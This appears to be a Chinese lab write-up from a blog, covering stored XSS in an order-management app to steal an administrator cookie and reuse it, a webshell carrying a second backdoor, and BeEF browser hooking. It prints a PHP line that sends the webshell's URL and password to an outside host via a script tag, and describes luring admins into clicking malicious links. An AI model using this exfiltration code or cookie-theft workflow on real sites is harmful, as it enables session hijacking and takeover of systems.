渗透学习-靶场篇-XSS之订单与shell箱子反杀


前言

这里,我们将综合的利用一下xss平台去进行对之前的某些站点进行攻击。本次将主要利用的是军锋真人cs野战的订单平台进行实验。除此之外,我们还将进行shell箱子的反杀过程!!


一、订单平台

下载源码:军锋真人cs野战

将其解压后,进行对config.php进行设置,设置对应的数据库密码,以及管理者的用户名和密码等等:,

然后访问install.php进行安装:
在这里插入图片描述

此时,便可以登录后台了:
在这里插入图片描述

接下来让我们正式开始XSS的测试:
先观察以下我们的这个订单页面:

在这里插入图片描述

发现这里存在一个具体要求的文本框,那么我们可以试想一下,这里是否可以进行xss的脚本注入呢?我们来浅尝一下:
在这里插入图片描述

然后在后台页面看一下:

在这里插入图片描述

okok,很完美,能够xss注入!

那么接下来我们继续进一步的来构造一下payload。

这里,我自己搭建了一个简易的xss平台:
在这里插入图片描述

然后,这里使用利用这个软件直接生成一个payload:
在这里插入图片描述

然后,把这个脚本放入到刚刚能够评论区里:
在这里插入图片描述

然后,在管理员后台进行查看一下订单信息,至此我们就已经完成攻击了,让我们返回xss平台看看是否获取?
在这里插入图片描述

okok,确实获取到了cookie,嘿嘿嘿! 然后我们再展示一下如何利用这个拿到的cookie吧:
直接利用postman软件,将获取到的cookie放入后就可以直接绕过了!
在这里插入图片描述

在这里插入图片描述

二、webshell箱子(黑吃黑)

以下由于webshell箱子是需要使用asp服务器的。因此,这里我使用asp迷你服务器(可快速搭建):

在这里插入图片描述

搭建起来后,我们直接访问箱子的后台:
在这里插入图片描述

然后,此时我们就使用一个webshell,并且在其中写入一些后门语句,从而形成后门中的后门:

webshell.php:
在这里插入图片描述

然后写入后门语句(在箱子里的api调用.txt文件中有如何写入代码),将该webshell上传后的地址及其管理密码进行返回:
在这里插入图片描述
$_SERVER[‘HTTP_HOST’] ==> 获取的是对应的ip或者域名

$_SERVER[‘PHP_SELF’] ==> 获取的是对应的php文件

将后门语句写入,webshell中:

$url=$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
echo "<script src='http://192.168.10.129:8081/api.asp?url=$url&pass=$password&id=1'></script>";

在这里插入图片描述

然后,我们模拟上传到对应的服务器中,并进行访问:
在这里插入图片描述

从图片中确实可以看到我们访问该webshell时候,这里向我们的webshell箱子发起了以此get请求,从而将数据记录到了箱子里:具体的我们可以看看箱子返回到的内容:
在这里插入图片描述

可以看到确实是接收了!!!

要知道,现在网上的webshell参差不齐,一般带有后门的webshell就会起各种危言耸听的名称以此来骗取经验不够的人去使用它,从而进一步的获取到你所攻破的哪一个网站的webshell权限。

当我们拿到一个webshell,并且执行后我们可以通过浏览器的【网络】功能来进行查看是否会向其他地址进行发送对应某些数据,如果有异常的,则就有可能里面含有后门!!! 如下图所示:

在这里插入图片描述

三、使用xss工具(Beef)

接下来呢,让我们使用一个比较好用且牛逼的工具Beef!

首先,打开beef这个工具:
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在看到上述的页面后,就说明我们已经成功的运行起了beef工具。然后,现在我们就要开始进行构造脚本语句,以方便进行测试。至于要如何构造,来反弹到beef当中呢? 这里我们就直接使用beef提供的脚本语句:
在这里插入图片描述

然后,我们去对应的网站李进行输入:
在这里插入图片描述

点击提交,然后当后台管理员省份查看一下本订单信息时,beef就会收到对应服务器的信息了:

在这里插入图片描述

然后,我们再看看beef其他强大的功能:

命今颜色( Color):

绿色对目标主机生效并且不可见(不会被发现)
橙色对目标主机生效但可能可见(可能被发现)
灰色对目标主机来必生效(可验证下)
红色对目标主机不生效

主要模块

Browsers

Exploits

Host

Persistence(持久)

Network

那么具体的,我们实验几个功能:

点击get cookie:

在这里插入图片描述

利用图片,骗取管理员进行点击,以此进行执行其他的恶意脚本(如进行社工):

在这里插入图片描述

然后让我们看看管理员的页面:
在这里插入图片描述

该图片里可是包含的一些链接的。实际情况下我们可以利用一些系统升级的命令进行替代!!


评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值